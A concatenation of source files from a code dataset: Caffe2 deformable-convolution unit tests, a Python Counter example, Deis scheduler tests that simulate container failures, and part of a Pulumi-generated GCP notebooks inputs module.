kernel=kernel,
dilation=dilation,
pad=pad,
order=order,
engine=engine,
device_option=gc,
)
workspace.RunOperatorOnce(reference_op)
reference_blob = workspace.FetchBlob("Y0")
return (reference_blob,)
self.assertReferenceChecks(gc, op, inputs, reference_conv_op)
@unittest.skipIf(not workspace.has_gpu_support, "No gpu support")
@given(
stride=st.integers(1, 3),
pad=st.integers(0, 0),
kernel=st.integers(1, 5),
dilation=st.integers(1, 3),
size=st.integers(7, 10),
input_channels=st.integers(1, 8),
output_channels=st.integers(1, 8),
batch_size=st.integers(1, 3),
order=st.sampled_from(["NCHW"]),
engine=st.sampled_from(["", "CUDNN", "MKLDNN"]),
use_bias=st.booleans(),
deformable_group=st.integers(1, 4),
**hu.gcs_gpu_only
)
def test_flat_input_convolution(
self,
stride,
pad,
kernel,
dilation,
size,
input_channels,
output_channels,
batch_size,
order,
engine,
use_bias,
deformable_group,
gc,
dc,
):
dkernel = dilation * (kernel - 1) + 1
if gc.device_type == caffe2_pb2.CUDA and engine == "CUDNN":
assume(_cudnn_supports(dilation=(dilation > 1), nhwc=(order == "NHWC")))
assume(engine != "MKLDNN" or use_bias is True)
op = core.CreateOperator(
"DeformConv",
["X", "o", "w", "b"] if use_bias else ["X", "o", "w"],
["Y"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order=order,
engine=engine,
deformable_group=deformable_group,
)
X = np.ones((batch_size, size, size, input_channels), np.float32) - 0.5
output_size = _conv_2d_output_size(
size, kernel, pad, pad, dilation, stride, stride
)
o = _conv_2d_random_offsets(batch_size, kernel, output_size, deformable_group)
w = np.ones((output_channels, kernel, kernel, input_channels), np.float32) - 0.5
b = np.random.rand(output_channels).astype(np.float32) - 0.5
if order == "NCHW":
X = utils.NHWC2NCHW(X)
w = utils.NHWC2NCHW(w)
inputs = [X, o, w, b] if use_bias else [X, o, w]
# Error handling path.
        if size + pad + pad < dkernel:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
if input_channels % deformable_group != 0:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
if output_channels % deformable_group != 0:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
def reference_conv_op(*args):
reference_op = core.CreateOperator(
"Conv",
["X", "w", "b"] if use_bias else ["X", "w"],
["Y0"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order=order,
engine=engine,
device_option=gc,
)
workspace.RunOperatorOnce(reference_op)
reference_blob = workspace.FetchBlob("Y0")
return (reference_blob,)
self.assertReferenceChecks(gc, op, inputs, reference_conv_op)
@unittest.skipIf(not workspace.has_gpu_support, "No gpu support")
@given(
stride=st.integers(1, 1),
pad=st.integers(0, 0),
kernel=st.integers(1, 5),
dilation=st.integers(1, 1),
size=st.integers(7, 10),
input_channels=st.integers(1, 8),
output_channels=st.integers(1, 8),
batch_size=st.integers(1, 3),
order=st.sampled_from(["NCHW"]),
engine=st.sampled_from(["", "CUDNN", "MKLDNN"]),
use_bias=st.booleans(),
deformable_group=st.integers(1, 4),
**hu.gcs_gpu_only
)
def test_shuffle_input_convolution(
self,
stride,
pad,
kernel,
dilation,
size,
input_channels,
output_channels,
batch_size,
order,
engine,
use_bias,
deformable_group,
gc,
dc,
):
dkernel = dilation * (kernel - 1) + 1
if gc.device_type == caffe2_pb2.CUDA and engine == "CUDNN":
assume(_cudnn_supports(dilation=(dilation > 1), nhwc=(order == "NHWC")))
assume(engine != "MKLDNN" or use_bias is True)
op = core.CreateOperator(
"DeformConv",
["X", "o", "w", "b"] if use_bias else ["X", "o", "w"],
["Y"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order=order,
engine=engine,
deformable_group=deformable_group,
)
X = (
np.random.rand(batch_size, size, size, input_channels).astype(np.float32)
- 0.5
)
output_size = _conv_2d_output_size(
size, kernel, pad, pad, dilation, stride, stride
)
o, w0 = _conv_2d_shuffle_offsets(
batch_size,
kernel,
output_size,
deformable_group,
input_channels,
output_channels,
)
w = np.ones((output_channels, kernel, kernel, input_channels), np.float32)
b = np.random.rand(output_channels).astype(np.float32) - 0.5
if order == "NCHW":
X = utils.NHWC2NCHW(X)
w = utils.NHWC2NCHW(w)
w0 = utils.NHWC2NCHW(w0)
inputs = [X, o, w, b] if use_bias else [X, o, w]
# Error handling path.
        if size + pad + pad < dkernel:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
if input_channels % deformable_group != 0:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
if output_channels % deformable_group != 0:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
def reference_conv_op(*args):
with core.DeviceScope(gc):
workspace.FeedBlob("w0", w0)
reference_op = core.CreateOperator(
"Conv",
["X", "w0", "b"] if use_bias else ["X", "w0"],
["Y0"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order=order,
engine=engine,
device_option=gc,
)
workspace.RunOperatorOnce(reference_op)
reference_blob = workspace.FetchBlob("Y0")
return (reference_blob,)
self.assertReferenceChecks(gc, op, inputs, reference_conv_op)
    # cuDNN does NOT support different padding values, so the CUDNN engine is skipped here
@unittest.skipIf(not workspace.has_gpu_support, "No gpu support")
@given(
stride_h=st.integers(1, 3),
stride_w=st.integers(1, 3),
pad_h=st.integers(0, 3),
pad_w=st.integers(0, 3),
kernel=st.integers(2, 5),
size=st.integers(1, 8),
input_channels=st.integers(1, 3),
output_channels=st.integers(1, 3),
batch_size=st.integers(1, 3),
order=st.sampled_from(["NCHW"]),
shared_buffer=st.booleans(),
use_bias=st.booleans(),
deformable_group=st.integers(1, 3),
**hu.gcs_gpu_only
)
def test_conv_separate_stride_pad_gradients(
self,
stride_h,
stride_w,
pad_h,
pad_w,
kernel,
size,
input_channels,
output_channels,
batch_size,
order,
shared_buffer,
use_bias,
deformable_group,
gc,
dc,
):
op = core.CreateOperator(
"DeformConv",
["X", "o", "w", "b"] if use_bias else ["X", "o", "w"],
["Y"],
stride_h=stride_h,
stride_w=stride_w,
pad_t=pad_h,
pad_l=pad_w,
pad_b=pad_h,
pad_r=pad_w,
kernel=kernel,
order=order,
shared_buffer=int(shared_buffer),
deformable_group=deformable_group,
)
X = (
np.random.rand(batch_size, size, size, input_channels).astype(np.float32)
- 0.5
)
output_size = _conv_2d_output_size(
size, kernel, pad_h, pad_w, 1, stride_h, stride_w
)
o = _conv_2d_random_offsets(batch_size, kernel, output_size, deformable_group)
w = (
np.random.rand(output_channels, kernel, kernel, input_channels).astype(
np.float32
)
- 0.5
)
b = np.random.rand(output_channels).astype(np.float32) - 0.5
if order == "NCHW":
X = utils.NHWC2NCHW(X)
w = utils.NHWC2NCHW(w)
inputs = [X, o, w, b] if use_bias else [X, o, w]
# Error handling path.
if size + pad_h * 2 < kernel or size + pad_w * 2 < kernel:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
if input_channels % deformable_group != 0:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
if output_channels % deformable_group != 0:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
self.assertDeviceChecks(dc, op, inputs, [0])
for i in range(len(inputs)):
self.assertGradientChecks(gc, op, inputs, i, [0])
@unittest.skipIf(not workspace.has_gpu_support, "No gpu support")
@given(
stride=st.integers(1, 3),
pad=st.integers(0, 3),
kernel=st.integers(1, 5),
dilation=st.integers(1, 3),
size=st.integers(7, 10),
input_channels=st.integers(1, 8),
output_channels=st.integers(1, 8),
batch_size=st.integers(1, 3),
order=st.sampled_from(["NCHW"]),
engine=st.sampled_from(["", "CUDNN", "MKLDNN"]),
use_bias=st.booleans(),
deformable_group=st.integers(1, 3),
**hu.gcs_gpu_only
)
def test_conv_gradients(
self,
stride,
pad,
kernel,
dilation,
size,
input_channels,
output_channels,
batch_size,
order,
engine,
use_bias,
deformable_group,
gc,
dc,
):
dkernel = dilation * (kernel - 1) + 1
if gc.device_type == caffe2_pb2.CUDA and engine == "CUDNN":
assume(_cudnn_supports(dilation=(dilation > 1), nhwc=(order == "NHWC")))
assume(engine != "MKLDNN" or use_bias is True)
op = core.CreateOperator(
"DeformConv",
["X", "o", "w", "b"] if use_bias else ["X", "o", "w"],
["Y"],
stride=stride,
kernel=kernel,
dilation=dilation,
pad=pad,
order=order,
engine=engine,
deformable_group=deformable_group,
)
X = (
np.random.rand(batch_size, size, size, input_channels).astype(np.float32)
- 0.5
)
output_size = _conv_2d_output_size(
size, kernel, pad, pad, dilation, stride, stride
)
o = _conv_2d_random_offsets(batch_size, kernel, output_size, deformable_group)
w = (
np.random.rand(output_channels, kernel, kernel, input_channels).astype(
np.float32
)
- 0.5
)
b = np.random.rand(output_channels).astype(np.float32) - 0.5
if order == "NCHW":
X = utils.NHWC2NCHW(X)
w = utils.NHWC2NCHW(w)
inputs = [X, o, w, b] if use_bias else [X, o, w]
# Error handling path.
        if size + pad + pad < dkernel:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
if input_channels % deformable_group != 0:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
if output_channels % deformable_group != 0:
with self.assertRaises(RuntimeError):
self.assertDeviceChecks(dc, op, inputs, [0])
return
self.assertDeviceChecks(dc, op, inputs, [0])
for i in range(len(inputs)):
self.assertGradientChecks(gc, op, inputs, i, [0])
if __name__ == "__main__":
    unittest.main()
| avg_line_length: 31.98 | max_line_length: 88 | alphanum_fraction: 0.542 |

| hexsha: 730f271daa01cea7e2a786ed7a0479a1657d4a7b | size: 174 | ext: py | lang: Python |
| path: src/lesson_data_structures/collections_counter_init.py |
| repo: jasonwee/asus-rt-n14uhp-mrtg @ 4fa96c3406e32ea6631ce447db6d19d70b2cd061 | licenses: ["Apache-2.0"] |
| stars: 3 (2018-08-14T09:33:52Z - 2022-03-21T12:31:58Z) | issues: null | forks: null |
import collections
print(collections.Counter(['a', 'b', 'c', 'a', 'b', 'b']))
print(collections.Counter({'a': 2, 'b': 3, 'c': 1}))
print(collections.Counter(a=2, b=3, c=1))
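# Absent keys count as zero rather than raising KeyError, and most_common()
# orders by count (ties keep insertion order):
c = collections.Counter(a=2, b=3, c=1)
print(c['missing'])     # 0
print(c.most_common())  # [('b', 3), ('a', 2), ('c', 1)]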
| avg_line_length: 29.00 | max_line_length: 58 | alphanum_fraction: 0.598 |

| hexsha: 731f366cb77b7e77026d7d8b5c59f0d946c66531 | size: 21,814 | ext: py | lang: Python |
| path: controller/api/tests/test_scheduler.py |
| repo: yun-an/deis @ de27c11475bb7ca24816f288aa115699a1c37e26 | licenses: ["Apache-2.0"] |
| stars: 3,375 (2015-01-01T04:03:45Z - 2022-02-08T14:53:45Z) | issues: 2,422 (2015-01-01T02:40:01Z - 2021-11-30T07:50:32Z) | forks: 688 (2015-01-01T00:36:48Z - 2022-01-22T00:32:07Z) |
"""
Unit tests for the Deis api app.
Run the tests with "./manage.py test api"
"""
from __future__ import unicode_literals
import json
from django.conf import settings
from django.contrib.auth.models import User
from django.test import TransactionTestCase
import mock
from rest_framework.authtoken.models import Token
from scheduler import chaos
@mock.patch('api.models.publish_release', lambda *args: None)
class SchedulerTest(TransactionTestCase):
"""Tests creation of containers on nodes"""
fixtures = ['tests.json']
def setUp(self):
self.user = User.objects.get(username='autotest')
self.token = Token.objects.get(user=self.user).key
# start without any chaos
chaos.CREATE_ERROR_RATE = 0
chaos.DESTROY_ERROR_RATE = 0
chaos.START_ERROR_RATE = 0
chaos.STOP_ERROR_RATE = 0
# use chaos scheduler
settings.SCHEDULER_MODULE = 'scheduler.chaos'
# provide mock authentication used for run commands
settings.SSH_PRIVATE_KEY = '<some-ssh-private-key>'
def tearDown(self):
# reset for subsequent tests
settings.SCHEDULER_MODULE = 'scheduler.mock'
settings.SSH_PRIVATE_KEY = ''
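    # Illustrative sketch of how the chaos scheduler's error-rate knobs are
    # likely consumed (the real logic lives in scheduler.chaos): each operation
    # fails independently with the configured probability, roughly
    #
    #     def create(name):
    #         if random.random() < CREATE_ERROR_RATE:
    #             raise RuntimeError('simulated create failure')
    #
    # so with a 0.5 rate, all 20 creates in a scale-up succeed with probability
    # 0.5 ** 20 (about 1e-6), which is why the tests below can assert a 503.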
def test_create_chaos(self):
url = '/v1/apps'
response = self.client.post(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
app_id = response.data['id']
# post a new build
url = "/v1/apps/{app_id}/builds".format(**locals())
body = {'image': 'autotest/example', 'sha': 'a'*40,
'procfile': json.dumps({'web': 'node server.js', 'worker': 'node worker.js'})}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
# scale to zero for consistency
url = "/v1/apps/{app_id}/scale".format(**locals())
body = {'web': 0}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 204)
# let's get chaotic
chaos.CREATE_ERROR_RATE = 0.5
# scale up but expect a 503
url = "/v1/apps/{app_id}/scale".format(**locals())
body = {'web': 20}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 503)
self.assertEqual(response.data, {'detail': 'aborting, failed to create some containers'})
self.assertEqual(response.get('content-type'), 'application/json')
# inspect broken containers
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 0)
def test_start_chaos(self):
url = '/v1/apps'
response = self.client.post(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
app_id = response.data['id']
# post a new build
url = "/v1/apps/{app_id}/builds".format(**locals())
body = {'image': 'autotest/example', 'sha': 'a'*40,
'procfile': json.dumps({'web': 'node server.js', 'worker': 'node worker.js'})}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
# scale to zero for consistency
url = "/v1/apps/{app_id}/scale".format(**locals())
body = {'web': 0}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 204)
# let's get chaotic
chaos.START_ERROR_RATE = 0.5
# scale up, which will allow some crashed containers
url = "/v1/apps/{app_id}/scale".format(**locals())
body = {'web': 20}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 204)
# inspect broken containers
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 20)
# make sure some failed
states = set([c['state'] for c in response.data['results']])
self.assertEqual(states, set(['crashed', 'up']))
def test_restart_chaos(self):
url = '/v1/apps'
response = self.client.post(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
app_id = response.data['id']
# post a new build
url = "/v1/apps/{app_id}/builds".format(**locals())
body = {'image': 'autotest/example', 'sha': 'a'*40,
'procfile': json.dumps({'web': 'node server.js', 'worker': 'node worker.js'})}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
# scale up, which will allow some crashed containers
url = "/v1/apps/{app_id}/scale".format(**locals())
body = {'web': 20, 'worker': 20}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 204)
# let's get chaotic
chaos.STOP_ERROR_RATE = 0.5
chaos.START_ERROR_RATE = 0.5
# reboot the web processes
url = "/v1/apps/{app_id}/containers/web/restart".format(**locals())
response = self.client.post(url,
content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200, response.data)
# inspect broken containers
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(response.data['count'], 40)
# make sure some failed
states = set([c['state'] for c in response.data['results']])
self.assertEqual(states, set(['crashed', 'up']))
# make sure that we only rebooted the web processes
types = set([c['type'] for c in response.data['results'] if c['state'] == 'crashed'])
self.assertEqual(types, set(['web']))
# start fresh
chaos.STOP_ERROR_RATE = 0.0
chaos.START_ERROR_RATE = 0.0
url = "/v1/apps/{app_id}/containers/web/restart".format(**locals())
response = self.client.post(url,
content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
# let the carnage continue
chaos.STOP_ERROR_RATE = 0.5
chaos.START_ERROR_RATE = 0.5
# reboot ALL the containers!
url = "/v1/apps/{app_id}/containers/restart".format(**locals())
response = self.client.post(url,
content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
# inspect broken containers
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 40)
# make sure some failed
states = set([c['state'] for c in response.data['results']])
self.assertEqual(states, set(['crashed', 'up']))
types = set([c['type'] for c in response.data['results']])
self.assertEqual(types, set(['web', 'worker']))
def test_destroy_chaos(self):
url = '/v1/apps'
response = self.client.post(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
app_id = response.data['id']
# post a new build
url = "/v1/apps/{app_id}/builds".format(**locals())
body = {'image': 'autotest/example', 'sha': 'a'*40,
'procfile': json.dumps({'web': 'node server.js', 'worker': 'node worker.js'})}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
# scale up
url = "/v1/apps/{app_id}/scale".format(**locals())
body = {'web': 20}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 204)
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 20)
# let's get chaotic
chaos.DESTROY_ERROR_RATE = 0.5
# scale to zero but expect a 503
url = "/v1/apps/{app_id}/scale".format(**locals())
body = {'web': 0}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 503)
self.assertEqual(response.data, {'detail': 'aborting, failed to destroy some containers'})
self.assertEqual(response.get('content-type'), 'application/json')
# inspect broken containers
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
states = set([c['state'] for c in response.data['results']])
self.assertEqual(states, set(['error']))
# make sure we can cleanup after enough tries
containers = 20
for _ in xrange(100):
url = "/v1/apps/{app_id}/scale".format(**locals())
body = {'web': 0}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
# break if we destroyed successfully
if response.status_code == 204:
break
self.assertEqual(response.status_code, 503)
self.assertEqual(response.data, {'detail': 'aborting, failed to '
'destroy some containers'})
self.assertEqual(response.get('content-type'), 'application/json')
# inspect broken containers
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
containers = len(response.data['results'])
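    # Sanity check on the retry budget above: with DESTROY_ERROR_RATE = 0.5,
    # expected survivors shrink geometrically (20 * 0.5 ** n after n passes,
    # i.e. below one container by n = 5), so the xrange(100) cap is generous.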
def test_build_chaos(self):
url = '/v1/apps'
response = self.client.post(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
app_id = response.data['id']
# post a new build
url = "/v1/apps/{app_id}/builds".format(**locals())
body = {'image': 'autotest/example', 'sha': 'a'*40,
'procfile': json.dumps({'web': 'node server.js', 'worker': 'node worker.js'})}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
# inspect builds
url = "/v1/apps/{app_id}/builds".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
# inspect releases
url = "/v1/apps/{app_id}/releases".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 2)
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
# scale up
url = "/v1/apps/{app_id}/scale".format(**locals())
body = {'web': 20}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 204)
# simulate failing to create containers
chaos.CREATE_ERROR_RATE = 0.5
chaos.START_ERROR_RATE = 0.5
# post a new build
url = "/v1/apps/{app_id}/builds".format(**locals())
body = {'image': 'autotest/example', 'sha': 'b'*40,
'procfile': json.dumps({'web': 'node server.js', 'worker': 'node worker.js'})}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 503)
self.assertEqual(response.data, {'detail': 'aborting, failed to create some containers'})
self.assertEqual(response.get('content-type'), 'application/json')
# inspect releases
url = "/v1/apps/{app_id}/releases".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 2)
# inspect containers
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 20)
# make sure all old containers are still up
states = set([c['state'] for c in response.data['results']])
self.assertEqual(states, set(['up']))
def test_config_chaos(self):
url = '/v1/apps'
response = self.client.post(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
app_id = response.data['id']
# post a new build
url = "/v1/apps/{app_id}/builds".format(**locals())
body = {'image': 'autotest/example', 'sha': 'a'*40,
'procfile': json.dumps({'web': 'node server.js', 'worker': 'node worker.js'})}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
# inspect releases
url = "/v1/apps/{app_id}/releases".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 2)
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
# scale up
url = "/v1/apps/{app_id}/scale".format(**locals())
body = {'web': 20}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 204)
# simulate failing to create or start containers
chaos.CREATE_ERROR_RATE = 0.5
chaos.START_ERROR_RATE = 0.5
# post a new config
url = "/v1/apps/{app_id}/config".format(**locals())
body = {'values': json.dumps({'NEW_URL1': 'http://localhost:8080/'})}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 503)
self.assertEqual(response.data, {'detail': 'aborting, failed to create some containers'})
self.assertEqual(response.get('content-type'), 'application/json')
# inspect releases
url = "/v1/apps/{app_id}/releases".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 2)
# inspect containers
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 20)
# make sure all old containers are still up
states = set([c['state'] for c in response.data['results']])
self.assertEqual(states, set(['up']))
def test_run_chaos(self):
url = '/v1/apps'
response = self.client.post(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
app_id = response.data['id']
# post a new build
url = "/v1/apps/{app_id}/builds".format(**locals())
body = {'image': 'autotest/example', 'sha': 'a'*40,
'procfile': json.dumps({'web': 'node server.js', 'worker': 'node worker.js'})}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 201)
# inspect builds
url = "/v1/apps/{app_id}/builds".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
# inspect releases
url = "/v1/apps/{app_id}/releases".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 2)
url = "/v1/apps/{app_id}/containers".format(**locals())
response = self.client.get(url, HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 200)
self.assertEqual(len(response.data['results']), 1)
# block all create operations
chaos.CREATE_ERROR_RATE = 1
# make sure the run fails with a 503
url = '/v1/apps/{app_id}/run'.format(**locals())
body = {'command': 'ls -al'}
response = self.client.post(url, json.dumps(body), content_type='application/json',
HTTP_AUTHORIZATION='token {}'.format(self.token))
self.assertEqual(response.status_code, 503)
self.assertEqual(response.data, {'detail': 'exit code 1'})
self.assertEqual(response.get('content-type'), 'application/json')
| avg_line_length: 54.81 | max_line_length: 98 | alphanum_fraction: 0.610 |

| hexsha: 733e3b9abbfc069503f5fab9a81e1eb485566103 | size: 17,106 | ext: py | lang: Python |
| path: sdk/python/pulumi_gcp/notebooks/_inputs.py |
| repo: sisisin/pulumi-gcp @ af6681d70ea457843409110c1324817fe55f68ad | licenses: ["ECL-2.0", "Apache-2.0"] |
| stars: null | issues: null | forks: null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'EnvironmentContainerImageArgs',
'EnvironmentVmImageArgs',
'InstanceAcceleratorConfigArgs',
'InstanceContainerImageArgs',
'InstanceIamBindingConditionArgs',
'InstanceIamMemberConditionArgs',
'InstanceReservationAffinityArgs',
'InstanceShieldedInstanceConfigArgs',
'InstanceVmImageArgs',
]
@pulumi.input_type
class EnvironmentContainerImageArgs:
def __init__(__self__, *,
repository: pulumi.Input[str],
tag: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] repository: The path to the container image repository.
For example: gcr.io/{project_id}/{imageName}
:param pulumi.Input[str] tag: The tag of the container image. If not specified, this defaults to the latest tag.
"""
pulumi.set(__self__, "repository", repository)
if tag is not None:
pulumi.set(__self__, "tag", tag)
@property
@pulumi.getter
def repository(self) -> pulumi.Input[str]:
"""
The path to the container image repository.
For example: gcr.io/{project_id}/{imageName}
"""
return pulumi.get(self, "repository")
@repository.setter
def repository(self, value: pulumi.Input[str]):
pulumi.set(self, "repository", value)
@property
@pulumi.getter
def tag(self) -> Optional[pulumi.Input[str]]:
"""
The tag of the container image. If not specified, this defaults to the latest tag.
"""
return pulumi.get(self, "tag")
@tag.setter
def tag(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tag", value)
@pulumi.input_type
class EnvironmentVmImageArgs:
def __init__(__self__, *,
project: pulumi.Input[str],
image_family: Optional[pulumi.Input[str]] = None,
image_name: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] project: The name of the Google Cloud project that this VM image belongs to.
Format: projects/{project_id}
:param pulumi.Input[str] image_family: Use this VM image family to find the image; the newest image in this family will be used.
:param pulumi.Input[str] image_name: Use VM image name to find the image.
"""
pulumi.set(__self__, "project", project)
if image_family is not None:
pulumi.set(__self__, "image_family", image_family)
if image_name is not None:
pulumi.set(__self__, "image_name", image_name)
@property
@pulumi.getter
def project(self) -> pulumi.Input[str]:
"""
